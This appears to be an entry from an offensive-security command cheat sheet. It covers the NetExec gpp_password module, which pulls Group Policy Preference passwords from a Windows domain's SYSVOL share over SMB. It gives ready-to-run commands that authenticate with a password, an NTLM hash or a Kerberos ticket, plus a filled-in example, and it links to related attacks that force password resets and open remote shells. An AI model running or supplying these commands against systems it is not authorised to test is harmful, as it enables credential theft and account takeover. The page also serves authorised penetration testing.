NetExec SMB GPP Password
Search SYSVOL for Group Policy Preference XML files containing encrypted passwords
- Tool
- nxc
- Category
- Credential Attacks / Password Manipulation
- Platform
- linux
- Requires
- password
- Protocols
- SMB
Syntax
Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.
nxc smb '<ip>' -u '<user>' -p '<password>' -M gpp_password
Credential variants
The same attack using a different authentication material.
NTLM Hash requires NTLM hash
nxc smb '<ip>' -u '<user>' -H '<hash>' -M gpp_password
Kerberos Ticket requires Kerberos ticket
nxc smb '<ip>' -u '<user>' --use-kcache -M gpp_password
Examples
nxc smb '192.168.1.100' -u 'user' -p 'password' -M gpp_password
Tags
Related commands
- NetExec SMB Auth Test Test SMB authentication with various credential types
- Evil-WinRM Shell Windows Remote Management shell connection
- bloodyAD add uac Toggle UserAccountControl flags on a target account. Setting DONT_REQ_PREAUTH on a user…
- BloodyAD Force Password Change Force password change using BloodyAD
- bloodyAD Set Password Reset another user's password if you have ForceChangePassword…
- Impacket changepasswd Change an AD user's password via RPC (requires appropriate ACL rights)
- Impacket Get-GPPPassword Decrypt Group Policy Preference (GPP) passwords from XML files
- Net RPC Password Change Force password change via Net RPC